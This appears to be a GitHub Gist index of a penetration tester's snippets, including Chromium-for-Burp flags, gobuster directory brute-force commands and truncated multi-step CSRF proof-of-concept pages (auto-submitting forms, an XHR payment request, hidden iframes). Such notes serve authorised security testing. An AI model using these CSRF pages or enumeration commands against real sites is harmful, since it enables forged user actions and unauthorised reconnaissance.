Drew hoodoer
💻
hoodoer
/ Chromium startup parameters
Created
December 10, 2019 09:30
Chromium startup command for Kali and web app testing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| chromium --no-sandbox --proxy-server="http://127.0.0.1:8080" --disable-xss-auditor & |
hoodoer
/ wireguardRoutingSnippet.txt
Created
December 10, 2019 09:29
Routing rule for wireguard VPN servers
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ufw route allow in on wg0s out on eth0 |
hoodoer
/ Set cookie from console
Created
December 10, 2019 09:28
Set cookie value at web console. This is stupid, but I do it so infrequently that I always end up googling it.
hoodoer
/ updateGitProjects.sh
Created
December 10, 2019 09:26
Script to update all git projects in a directory. nice for updating backups once you've cloned all the repos you want into a directory.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| for i in `ls -d */`; do cd $i && git pull && cd ..; done |
hoodoer
/ gobusterCommands.txt
Last active
March 27, 2024 18:08
Gobuster command line examples, with and without proxy
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Using the proxy (burp) can result in rediculously huge project files. You've been warned. | |
| gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -p http://localhost:8080 -k -l | |
| gobuster dir -u https://SOMEURL.com -w /some/word/list.txt -k -l | |
| If you can use --wildcard if it's choking on responses, however if it's sending back 302's for nonexistant, | |
| just change up the accepted status codes: | |
| gobuster dir -u https://SOMNEURL.com -w /som/word/list.txt -k -l -s 200,204,301,307,401,403 |
hoodoer
/ landingPage.html
Created
December 10, 2019 09:22
New tab based multi-request CSRF. Opens requests in a new tab if iframes are blocked. Haven't gotten this working quite yet though..
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <script language="javascript"> | |
| window.onload = function() { | |
| document.getElementById("csrfForm1").submit(); | |
| // to make 2nd form wait for 1st, put the following in a function and use as a callback for a new timer | |
| document.getElementById("csrfForm2").submit(); | |
| } |
hoodoer
/ csrfPoc.js
Created
December 10, 2019 09:19
XHR Based multi-step CSRF. CORS policy can block this
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function start() | |
| { | |
| alert("Start?"); | |
| } | |
| function sendRequests() | |
| { | |
| // Setup the payment |
hoodoer
/ Landing Page.html
Last active
December 10, 2019 09:19
IFrames Based Multi-Step CSRF. X-Frame-Options can block this.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hello! Two step CSRF coming up... | |
| <iframe src="step1.html" width="0" height="0"> | |
| </iframe> | |
| <iframe src="step2.html" width="0" height="0"> | |
| </iframe> |
hoodoer
/ List of IP Reputation Checking Services.txt
Last active
November 10, 2021 21:23
Online services to check the reputation of your IP address. Most of these are related to sending email.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://whatismyipaddress.com/blacklist-check | |
| https://ipcheck.proofpoint.com/ | |
| https://www.ipvoid.com/ip-blacklist-check/ | |
| https://talosintelligence.com/reputation_center | |
| https://www.cyren.com/security-center/cyren-ip-reputation-check |
NewerOlder